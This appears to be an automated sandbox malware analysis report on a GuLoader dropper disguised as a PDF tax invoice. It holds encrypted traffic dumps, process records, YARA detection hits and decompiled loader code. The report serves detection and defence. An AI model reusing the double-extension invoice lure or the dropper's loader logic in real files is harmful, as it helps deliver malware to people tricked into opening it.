                      2021-12-02 07:33:44 UTC104INData Raw: b9 08 0b 01 05 20 d9 c3 28 73 ac aa f2 e9 94 a6 45 c9 e7 31 68 f7 11 b2 e5 bb 40 70 9f e4 29 c9 4f 09 98 d6 e6 30 15 4d a3 e8 9b fd c3 9e 06 6e c2 be 44 f1 c8 68 f8 a8 b4 44 31 8a 76 3e 7d 2f f1 24 63 7e f7 09 8b d2 34 30 32 09 46 e4 f8 d4 cf ff 0d 98 7d c7 04 3e 06 fc e3 d5 67 db c2 84 b6 83 6c 0d 40 50 b5 7f df ad b8 92 b0 21 da 80 df bb cd db 56 5c 4b 3f 69 13 d9 ce 7f 42 d4 28 4a ec 46 e6 5e d9 7c cf 2f 82 c9 1f 48 b4 13 cd 50 b7 2b 06 21 67 7d 85 81 ff 74 a2 4d ae bc 59 8a 4b 35 aa 0d 0a b3 0b 70 a2 5b 35 27 c9 b7 c0 54 06 66 56 07 ee 6c af 01 ba 50 98 41 bb 59 3b f8 c9 0d 36 b1 75 d6 45 6f b4 4a cb 20 3f d9 2d d0 61 6a a9 9e 2c fc 9e 46 e9 2f ec 7d ed 9a 1f dc 1d 20 2b 17 13 5c 6e d6 1d a2 a4 8e 2f 32 28 b0 84 da 41 60 21 a5 15 e9 01 ef 59 be b1 7e
                      Data Ascii: (sE1h@p)O0MnDhD1v>}/$c~402F}>gl@P!V\K?iB(JF^|/HP+!g}tMYK5p[5'TfVlPAY;6uEoJ ?-aj,F/} +\n/2(A`!Y~
                      2021-12-02 07:33:44 UTC106INData Raw: b5 3d f0 27 6a 31 bb b2 86 9b 5d 62 e6 9b ee 1f bb d4 a1 9f 6a 5c ee 12 db e4 8f 76 52 6a c0 c0 5f d9 c1 2b 67 f1 4c 0c 92 ee 2b be ed c2 d0 35 6e 5c 04 33 7c 4b 43 ad 43 10 a3 b6 08 b5 0a a2 ee 08 56 d9 8b 35 ca b7 27 f3 43 1b 7e ee 7a 40 ce dc d2 73 c3 2c 41 ed 3a f6 9f 87 43 10 4b 6b bd eb 83 24 38 b0 94 9e f6 d2 b1 53 ed 13 1a 0a 12 c7 4b 15 df 61 62 4b f7 5e 93 85 f0 4f 68 ff d6 4f 7c f8 3b 86 f1 6d bf e4 25 9e 35 7d 75 b0 92 c1 c2 40 d0 81 0e 23 0e 69 2d 75 e4 eb 01 ff 8d 9e 6e fd 77 8a c1 56 5a 47 a7 44 d7 03 80 f4 ee 02 59 3d 97 ce 03 c7 2e 73 4d 42 61 f3 7c ab c7 f0 00 e1 e6 d5 2e 00 0f 5b f2 13 e9 60 2a 3b cf b0 a4 20 56 41 1d 9e 84 16 57 ff 5f 39 d8 bd 5e af b8 6e 6c 22 92 3e 22 31 2d a3 0d ac f6 b8 75 74 e4 93 fd 7a b8 34 10 45 cb a8 9a 49 ee
                      Data Ascii: ='j1]bj\vRj_+gL+5n\3|KCCV5'C~z@s,A:CKk$8SKabK^OhO|;m%5}u@#i-unwVZGDY=.sMBa|.[`*; VAW_9^nl">"1-utz4EI
                      2021-12-02 07:33:44 UTC107INData Raw: c0 54 06 66 56 07 ee 6c af 01 ba 50 98 41 bb 59 3b f8 c9 0d 36 b1 75 d6 45 6f b4 4a cb 20 3f d9 2d d0 61 6a a9 9e 2c fc 9e 46 e9 2f ec 7d ed 9a 1f dc 1d 20 2b 17 13 5c 6e d6 1d a2 a4 8e 2f 32 28 b0 84 da 41 60 21 a5 15 e9 01 ef 59 be b1 7e 68 60 91 23 d4 e5 7c bc 91 72 3c 98 3a 57 26 4c fa fd 4e 19 24 76 77 8d 0c 39 9c 22 3d b4 b6 8e ba 5f a7 7e b0 31 52 52 81 47 5b 77 18 c1 71 a8 51 66 68 d4 1d 83 aa 51 fa 9e 9d b5 be 02 f3 66 6d 6e f5 6f 07 36 e1 3d 7d aa 71 f8 52 48 de cd 78 b7 ad 62 29 c6 18 f0 bd 3e 6d c9 49 39 dc 13 a3 4b 22 3c 4e 1a eb aa c3 6c 3d dc 45 57 c0 3a d8 60 f5 98 16 6b fd cb 71 ed 65 56 0e 23 5f ee 72 3e 02 02 61 70 65 e7 47 ac 5b ba 38 8c 25 21 ca 17 2d cc 7f 93 8c 5d f8 91 06 cc 5c fe 8d 11 94 21 df 9f 77 30 a3 67 1a a1 5f 3c 59 82 18
                      Data Ascii: TfVlPAY;6uEoJ ?-aj,F/} +\n/2(A`!Y~h`#|r<:W&LN$vw9"=_~1RRG[wqQfhQfmno6=}qRHxb)>mI9K"<Nl=EW:`kqeV#_r>apeG[8%!-]\!w0g_<Y
                      2021-12-02 07:33:44 UTC108INData Raw: f4 ee 02 59 3d 97 ce 03 c7 2e 73 4d 42 61 f3 7c ab c7 f0 00 e1 e6 d5 2e 00 0f 5b f2 13 e9 60 2a 3b cf b0 a4 20 56 41 1d 9e 84 16 57 ff 5f 39 d8 bd 5e af b8 6e 6c 22 92 3e 22 31 2d a3 0d ac f6 b8 75 74 e4 93 fd 7a b8 34 10 45 cb a8 9a 49 ee f6 8d 53 40 9d 87 7e d0 57 9e 41 18 65 df 59 c3 90 f3 f3 78 d3 c6 7c 71 ac d5 c8 cd 4b b9 d6 83 ed 18 63 2f 93 09 a4 36 5d 18 c2 28 5c bc d7 fb a0 c3 4c e5 26 90 90 3d 18 e7 0b 36 f7 86 2d b9 08 0b 01 05 20 d9 c3 28 73 ac aa f2 e9 94 a6 45 c9 e7 31 68 f7 11 b2 e5 bb 40 70 9f e4 29 c9 4f 09 98 d6 e6 30 15 4d a3 e8 9b fd c3 9e 06 6e c2 be 44 f1 c8 68 f8 a8 b4 44 31 8a 76 3e 7d 2f f1 24 63 7e f7 09 8b d2 34 30 32 09 46 e4 f8 d4 cf ff 0d 98 7d c7 04 3e 06 fc e3 d5 67 db c2 84 b6 83 6c 0d 40 50 b5 7f df ad b8 92 b0 21 da 80
                      Data Ascii: Y=.sMBa|.[`*; VAW_9^nl">"1-utz4EIS@~WAeYx|qKc/6](\L&=6- (sE1h@p)O0MnDhD1v>}/$c~402F}>gl@P!
                      2021-12-02 07:33:44 UTC109INData Raw: 13 a3 4b 22 3c 4e 1a eb aa c3 6c 3d dc 45 57 c0 3a d8 60 f5 98 16 6b fd cb 71 ed 65 56 0e 23 5f ee 72 3e 02 02 61 70 65 e7 47 ac 5b ba 38 8c 25 21 ca 17 2d cc 7f 93 8c 5d f8 91 06 cc 5c fe 8d 11 94 21 df 9f 77 30 a3 67 1a a1 5f 3c 59 82 18 78 80 7f cd f4 a0 d4 72 b6 a8 a9 b4 77 b9 ad 9d a0 83 f2 93 b5 fa d8 16 40 1c bc cf a8 47 a3 05 c2 f3 d3 0e 3f 9c 9b 29 ce 77 b6 09 4d b2 a1 62 de 3e 71 7b 79 1f 8e e5 c6 1c 5a 32 8d d1 42 b5 3d f0 27 6a 31 bb b2 86 9b 5d 62 e6 9b ee 1f bb d4 a1 9f 6a 5c ee 12 db e4 8f 76 52 6a c0 c0 5f d9 c1 2b 67 f1 4c 0c 92 ee 2b be ed c2 d0 35 6e 5c 04 33 7c 4b 43 ad 43 10 a3 b6 08 b5 0a a2 ee 08 56 d9 8b 35 ca b7 27 f3 43 1b 7e ee 7a 40 ce dc d2 73 c3 2c 41 ed 3a f6 9f 87 43 10 4b 6b bd eb 83 24 38 b0 94 9e f6 d2 b1 53 ed 13 1a 0a
                      Data Ascii: K"<Nl=EW:`kqeV#_r>apeG[8%!-]\!w0g_<Yxrw@G?)wMb>q{yZ2B='j1]bj\vRj_+gL+5n\3|KCCV5'C~z@s,A:CKk$8S


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:08:32:03
                      Start date:02/12/2021
                      Path:C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe"
                      Imagebase:0x400000
                      File size:190030 bytes
                      MD5 hash:9FF3B37069E0772AF03732B022C02789
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:08:32:11
                      Start date:02/12/2021
                      Path:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      Imagebase:0x400000
                      File size:99217408 bytes
                      MD5 hash:6196B71B6602AA420325B1124C64B20A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.788404453.0000000008160000.00000040.00000001.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low

                      General

                      Start time:08:33:04
                      Start date:02/12/2021
                      Path:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                      Imagebase:0x400000
                      File size:99217408 bytes
                      MD5 hash:6196B71B6602AA420325B1124C64B20A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.787227598.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      Disassembly

                      Code Analysis

                      Reset < >

                        Executed Functions

                        C-Code - Quality: 78%
                        			_entry_() {
                        				WCHAR* _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				int _v24;
                        				int _v28;
                        				struct _TOKEN_PRIVILEGES _v40;
                        				signed char _v42;
                        				int _v44;
                        				signed int _v48;
                        				intOrPtr _v278;
                        				signed short _v310;
                        				struct _OSVERSIONINFOW _v324;
                        				struct _SHFILEINFOW _v1016;
                        				intOrPtr* _t88;
                        				WCHAR* _t92;
                        				char* _t94;
                        				void _t97;
                        				void* _t116;
                        				WCHAR* _t118;
                        				signed int _t119;
                        				intOrPtr* _t123;
                        				void* _t137;
                        				void* _t143;
                        				void* _t148;
                        				void* _t152;
                        				void* _t157;
                        				signed int _t167;
                        				void* _t170;
                        				void* _t175;
                        				intOrPtr _t177;
                        				intOrPtr _t178;
                        				intOrPtr* _t179;
                        				int _t188;
                        				void* _t189;
                        				void* _t198;
                        				signed int _t204;
                        				signed int _t209;
                        				signed int _t214;
                        				signed int _t216;
                        				int* _t218;
                        				signed int _t226;
                        				signed int _t229;
                        				CHAR* _t231;
                        				char* _t232;
                        				signed int _t233;
                        				WCHAR* _t234;
                        				void* _t250;
                        
                        				_t216 = 0x20;
                        				_t188 = 0;
                        				_v24 = 0;
                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                        				_v20 = 0;
                        				SetErrorMode(0x8001); // executed
                        				_v324.szCSDVersion = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				_v324.dwOSVersionInfoSize = 0x11c;
                        				if(GetVersionExW( &_v324) == 0) {
                        					_v324.dwOSVersionInfoSize = 0x114;
                        					GetVersionExW( &_v324);
                        					asm("sbb eax, eax");
                        					_v42 = 4;
                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                        				}
                        				if(_v324.dwMajorVersion < 0xa) {
                        					_v310 = _v310 & 0x00000000;
                        				}
                        				 *0x434fb8 = _v324.dwBuildNumber;
                        				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                        				if( *0x434fbe != 0x600) {
                        					_t179 = E0040690A(_t188);
                        					if(_t179 != _t188) {
                        						 *_t179(0xc00);
                        					}
                        				}
                        				_t231 = "UXTHEME";
                        				do {
                        					E0040689A(_t231); // executed
                        					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                        				} while ( *_t231 != 0);
                        				E0040690A(0xb);
                        				 *0x434f04 = E0040690A(9);
                        				_t88 = E0040690A(7);
                        				if(_t88 != _t188) {
                        					_t88 =  *_t88(0x1e);
                        					if(_t88 != 0) {
                        						 *0x434fbc =  *0x434fbc | 0x00000080;
                        					}
                        				}
                        				__imp__#17();
                        				__imp__OleInitialize(_t188); // executed
                        				 *0x434fc0 = _t88;
                        				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
                        				E0040653D(0x433f00, L"NSIS Error");
                        				_t92 = GetCommandLineW();
                        				_t232 = L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" ";
                        				E0040653D(_t232, _t92);
                        				_t94 = _t232;
                        				_t233 = 0x22;
                        				 *0x434f00 = 0x400000;
                        				_t250 = L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" " - _t233; // 0x22
                        				if(_t250 == 0) {
                        					_t216 = _t233;
                        					_t94 =  &M00440002;
                        				}
                        				_t198 = CharNextW(E00405E39(_t94, _t216));
                        				_v16 = _t198;
                        				while(1) {
                        					_t97 =  *_t198;
                        					_t251 = _t97 - _t188;
                        					if(_t97 == _t188) {
                        						break;
                        					}
                        					_t209 = 0x20;
                        					__eflags = _t97 - _t209;
                        					if(_t97 != _t209) {
                        						L17:
                        						__eflags =  *_t198 - _t233;
                        						_v12 = _t209;
                        						if( *_t198 == _t233) {
                        							_v12 = _t233;
                        							_t198 = _t198 + 2;
                        							__eflags = _t198;
                        						}
                        						__eflags =  *_t198 - 0x2f;
                        						if( *_t198 != 0x2f) {
                        							L32:
                        							_t198 = E00405E39(_t198, _v12);
                        							__eflags =  *_t198 - _t233;
                        							if(__eflags == 0) {
                        								_t198 = _t198 + 2;
                        								__eflags = _t198;
                        							}
                        							continue;
                        						} else {
                        							_t198 = _t198 + 2;
                        							__eflags =  *_t198 - 0x53;
                        							if( *_t198 != 0x53) {
                        								L24:
                        								asm("cdq");
                        								asm("cdq");
                        								_t214 = L"NCRC" & 0x0000ffff;
                        								asm("cdq");
                        								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                        								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                        								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                        									L29:
                        									asm("cdq");
                        									asm("cdq");
                        									_t209 = L" /D=" & 0x0000ffff;
                        									asm("cdq");
                        									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                        									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                        									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                        										L31:
                        										_t233 = 0x22;
                        										goto L32;
                        									}
                        									__eflags =  *_t198 - _t229;
                        									if( *_t198 == _t229) {
                        										 *(_t198 - 4) = _t188;
                        										__eflags = _t198;
                        										E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
                        										L37:
                        										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                        										GetTempPathW(0x400, _t234);
                        										_t116 = E004034FC(_t198, _t251);
                        										_t252 = _t116;
                        										if(_t116 != 0) {
                        											L40:
                        											DeleteFileW(L"1033"); // executed
                        											_t118 = E0040307D(_t254, _v20); // executed
                        											_v8 = _t118;
                        											if(_t118 != _t188) {
                        												L68:
                        												ExitProcess(); // executed
                        												__imp__OleUninitialize(); // executed
                        												if(_v8 == _t188) {
                        													if( *0x434f94 == _t188) {
                        														L77:
                        														_t119 =  *0x434fac;
                        														if(_t119 != 0xffffffff) {
                        															_v24 = _t119;
                        														}
                        														ExitProcess(_v24);
                        													}
                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                        														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                        														_v40.PrivilegeCount = 1;
                        														_v28 = 2;
                        														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                        													}
                        													_t123 = E0040690A(4);
                        													if(_t123 == _t188) {
                        														L75:
                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                        															goto L77;
                        														}
                        														goto L76;
                        													} else {
                        														_push(0x80040002);
                        														_push(0x25);
                        														_push(_t188);
                        														_push(_t188);
                        														_push(_t188);
                        														if( *_t123() == 0) {
                        															L76:
                        															E0040140B(9);
                        															goto L77;
                        														}
                        														goto L75;
                        													}
                        												}
                        												E00405B9D(_v8, 0x200010);
                        												ExitProcess(2);
                        											}
                        											if( *0x434f1c == _t188) {
                        												L51:
                        												 *0x434fac =  *0x434fac | 0xffffffff;
                        												_v24 = E00403BEC(_t264);
                        												goto L68;
                        											}
                        											_t218 = E00405E39(L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" ", _t188);
                        											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" ") {
                        												L48:
                        												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" ";
                        												_v8 = L"Error launching installer";
                        												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" ") {
                        													_t189 = E00405B08(__eflags);
                        													lstrcatW(_t234, L"~nsu");
                        													__eflags = _t189;
                        													if(_t189 != 0) {
                        														lstrcatW(_t234, "A");
                        													}
                        													lstrcatW(_t234, L".tmp");
                        													_t219 = L"C:\\Users\\jones\\Desktop";
                        													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
                        													__eflags = _t137;
                        													if(_t137 == 0) {
                        														L67:
                        														_t188 = 0;
                        														__eflags = 0;
                        														goto L68;
                        													} else {
                        														__eflags = _t189;
                        														_push(_t234);
                        														if(_t189 == 0) {
                        															E00405AEB();
                        														} else {
                        															E00405A6E();
                        														}
                        														SetCurrentDirectoryW(_t234);
                        														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                        														if(__eflags == 0) {
                        															E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
                        														}
                        														E0040653D(0x436000, _v16);
                        														_t201 = "A" & 0x0000ffff;
                        														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                        														__eflags = _t143;
                        														_v12 = 0x1a;
                        														 *0x436800 = _t143;
                        														do {
                        															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                        															DeleteFileW(0x42aa28);
                        															__eflags = _v8;
                        															if(_v8 != 0) {
                        																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
                        																__eflags = _t148;
                        																if(_t148 != 0) {
                        																	E004062FD(_t201, 0x42aa28, 0);
                        																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                        																	_t152 = E00405B20(0x42aa28);
                        																	__eflags = _t152;
                        																	if(_t152 != 0) {
                        																		CloseHandle(_t152);
                        																		_v8 = 0;
                        																	}
                        																}
                        															}
                        															 *0x436800 =  *0x436800 + 1;
                        															_t61 =  &_v12;
                        															 *_t61 = _v12 - 1;
                        															__eflags =  *_t61;
                        														} while ( *_t61 != 0);
                        														E004062FD(_t201, _t234, 0);
                        														goto L67;
                        													}
                        												}
                        												 *_t218 = _t188;
                        												_t221 =  &(_t218[2]);
                        												_t157 = E00405F14(_t263,  &(_t218[2]));
                        												_t264 = _t157;
                        												if(_t157 == 0) {
                        													goto L68;
                        												}
                        												E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
                        												E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
                        												_v8 = _t188;
                        												goto L51;
                        											}
                        											asm("cdq");
                        											asm("cdq");
                        											asm("cdq");
                        											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                        											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                        											while( *_t218 != _t204 || _t218[1] != _t167) {
                        												_t218 = _t218;
                        												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe\" ") {
                        													continue;
                        												}
                        												break;
                        											}
                        											_t188 = 0;
                        											goto L48;
                        										}
                        										GetWindowsDirectoryW(_t234, 0x3fb);
                        										lstrcatW(_t234, L"\\Temp");
                        										_t170 = E004034FC(_t198, _t252);
                        										_t253 = _t170;
                        										if(_t170 != 0) {
                        											goto L40;
                        										}
                        										GetTempPathW(0x3fc, _t234);
                        										lstrcatW(_t234, L"Low");
                        										SetEnvironmentVariableW(L"TEMP", _t234);
                        										SetEnvironmentVariableW(L"TMP", _t234);
                        										_t175 = E004034FC(_t198, _t253);
                        										_t254 = _t175;
                        										if(_t175 == 0) {
                        											goto L68;
                        										}
                        										goto L40;
                        									}
                        									goto L31;
                        								}
                        								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                        								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                        									goto L29;
                        								}
                        								_t177 =  *((intOrPtr*)(_t198 + 8));
                        								__eflags = _t177 - 0x20;
                        								if(_t177 == 0x20) {
                        									L28:
                        									_t36 =  &_v20;
                        									 *_t36 = _v20 | 0x00000004;
                        									__eflags =  *_t36;
                        									goto L29;
                        								}
                        								__eflags = _t177 - _t188;
                        								if(_t177 != _t188) {
                        									goto L29;
                        								}
                        								goto L28;
                        							}
                        							_t178 =  *((intOrPtr*)(_t198 + 2));
                        							__eflags = _t178 - _t209;
                        							if(_t178 == _t209) {
                        								L23:
                        								 *0x434fa0 = 1;
                        								goto L24;
                        							}
                        							__eflags = _t178 - _t188;
                        							if(_t178 != _t188) {
                        								goto L24;
                        							}
                        							goto L23;
                        						}
                        					} else {
                        						goto L16;
                        					}
                        					do {
                        						L16:
                        						_t198 = _t198 + 2;
                        						__eflags =  *_t198 - _t209;
                        					} while ( *_t198 == _t209);
                        					goto L17;
                        				}
                        				goto L37;
                        			}



















































                        0x0040353b
                        0x0040353c
                        0x00403543
                        0x00403546
                        0x0040354d
                        0x00403550
                        0x00403563
                        0x00403569
                        0x0040356c
                        0x0040356f
                        0x0040357d
                        0x00403585
                        0x00403590
                        0x004035a9
                        0x004035ab
                        0x004035b3
                        0x004035b3
                        0x004035be
                        0x004035c0
                        0x004035c0
                        0x004035d5
                        0x004035fa
                        0x00403608
                        0x0040360b
                        0x00403612
                        0x00403619
                        0x00403619
                        0x00403612
                        0x0040361b
                        0x00403620
                        0x00403621
                        0x0040362d
                        0x00403631
                        0x00403638
                        0x00403646
                        0x0040364b
                        0x00403652
                        0x00403656
                        0x0040365a
                        0x0040365c
                        0x0040365c
                        0x0040365a
                        0x00403663
                        0x0040366a
                        0x00403670
                        0x00403688
                        0x00403698
                        0x0040369d
                        0x004036a3
                        0x004036aa
                        0x004036b1
                        0x004036b3
                        0x004036b4
                        0x004036be
                        0x004036c5
                        0x004036c7
                        0x004036c9
                        0x004036c9
                        0x004036dc
                        0x004036de
                        0x004037d8
                        0x004037d8
                        0x004037db
                        0x004037de
                        0x00000000
                        0x00000000
                        0x004036e8
                        0x004036e9
                        0x004036ec
                        0x004036f5
                        0x004036f5
                        0x004036f8
                        0x004036fb
                        0x004036fe
                        0x00403701
                        0x00403701
                        0x00403701
                        0x00403702
                        0x00403706
                        0x004037c6
                        0x004037cf
                        0x004037d1
                        0x004037d4
                        0x004037d7
                        0x004037d7
                        0x004037d7
                        0x00000000
                        0x0040370c
                        0x0040370d
                        0x0040370e
                        0x00403712
                        0x0040372c
                        0x00403733
                        0x00403746
                        0x00403747
                        0x0040375c
                        0x00403761
                        0x00403763
                        0x00403765
                        0x00403781
                        0x00403788
                        0x0040379b
                        0x0040379c
                        0x004037b1
                        0x004037b7
                        0x004037b9
                        0x004037bb
                        0x004037c3
                        0x004037c5
                        0x00000000
                        0x004037c5
                        0x004037bf
                        0x004037c1
                        0x004037e6
                        0x004037ea
                        0x004037f3
                        0x004037f8
                        0x004037fe
                        0x00403809
                        0x0040380b
                        0x00403810
                        0x00403812
                        0x0040386a
                        0x0040386f
                        0x00403878
                        0x0040387f
                        0x00403882
                        0x00403a59
                        0x00403a59
                        0x00403a5e
                        0x00403a67
                        0x00403a84
                        0x00403afc
                        0x00403afc
                        0x00403b04
                        0x00403b06
                        0x00403b06
                        0x00403b0c
                        0x00403b0c
                        0x00403a9b
                        0x00403aa7
                        0x00403ab8
                        0x00403abf
                        0x00403ac6
                        0x00403ac6
                        0x00403ace
                        0x00403ada
                        0x00403ae8
                        0x00403af3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403adc
                        0x00403adc
                        0x00403add
                        0x00403adf
                        0x00403ae0
                        0x00403ae1
                        0x00403ae6
                        0x00403af5
                        0x00403af7
                        0x00000000
                        0x00403af7
                        0x00000000
                        0x00403ae6
                        0x00403ada
                        0x00403a71
                        0x00403a78
                        0x00403a78
                        0x0040388e
                        0x00403935
                        0x00403935
                        0x00403941
                        0x00000000
                        0x00403941
                        0x0040389f
                        0x004038a7
                        0x004038f9
                        0x004038f9
                        0x004038ff
                        0x00403906
                        0x00403954
                        0x00403956
                        0x0040395b
                        0x0040395d
                        0x00403965
                        0x00403965
                        0x00403970
                        0x00403975
                        0x0040397c
                        0x00403982
                        0x00403984
                        0x00403a57
                        0x00403a57
                        0x00403a57
                        0x00000000
                        0x0040398a
                        0x0040398a
                        0x0040398c
                        0x0040398d
                        0x00403996
                        0x0040398f
                        0x0040398f
                        0x0040398f
                        0x0040399c
                        0x004039a4
                        0x004039ab
                        0x004039b3
                        0x004039b3
                        0x004039c0
                        0x004039cc
                        0x004039d6
                        0x004039d6
                        0x004039d8
                        0x004039df
                        0x004039e9
                        0x004039f5
                        0x004039fb
                        0x00403a01
                        0x00403a04
                        0x00403a0e
                        0x00403a14
                        0x00403a16
                        0x00403a1a
                        0x00403a2b
                        0x00403a31
                        0x00403a36
                        0x00403a38
                        0x00403a3b
                        0x00403a41
                        0x00403a41
                        0x00403a38
                        0x00403a16
                        0x00403a44
                        0x00403a4b
                        0x00403a4b
                        0x00403a4b
                        0x00403a4b
                        0x00403a52
                        0x00000000
                        0x00403a52
                        0x00403984
                        0x00403908
                        0x0040390b
                        0x0040390f
                        0x00403914
                        0x00403916
                        0x00000000
                        0x00000000
                        0x00403922
                        0x0040392d
                        0x00403932
                        0x00000000
                        0x00403932
                        0x004038b0
                        0x004038c8
                        0x004038d9
                        0x004038da
                        0x004038de
                        0x004038e0
                        0x004038ee
                        0x004038f5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004038f5
                        0x004038f7
                        0x00000000
                        0x004038f7
                        0x0040381a
                        0x00403826
                        0x0040382b
                        0x00403830
                        0x00403832
                        0x00000000
                        0x00000000
                        0x0040383a
                        0x00403842
                        0x00403853
                        0x0040385b
                        0x0040385d
                        0x00403862
                        0x00403864
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403864
                        0x00000000
                        0x004037c1
                        0x0040376a
                        0x0040376c
                        0x00000000
                        0x00000000
                        0x0040376e
                        0x00403772
                        0x00403776
                        0x0040377d
                        0x0040377d
                        0x0040377d
                        0x0040377d
                        0x00000000
                        0x0040377d
                        0x00403778
                        0x0040377b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040377b
                        0x00403714
                        0x00403718
                        0x0040371b
                        0x00403722
                        0x00403722
                        0x00000000
                        0x00403722
                        0x0040371d
                        0x00403720
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403720
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004036ee
                        0x004036ee
                        0x004036ef
                        0x004036f0
                        0x004036f0
                        0x00000000
                        0x004036ee
                        0x00000000

                        APIs
                        • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                        • GetVersionExW.KERNEL32(?), ref: 00403579
                        • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                        • OleInitialize.OLE32(00000000), ref: 0040366A
                        • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                        • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe" ,00000020,"C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe" ,00000000), ref: 004036D6
                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
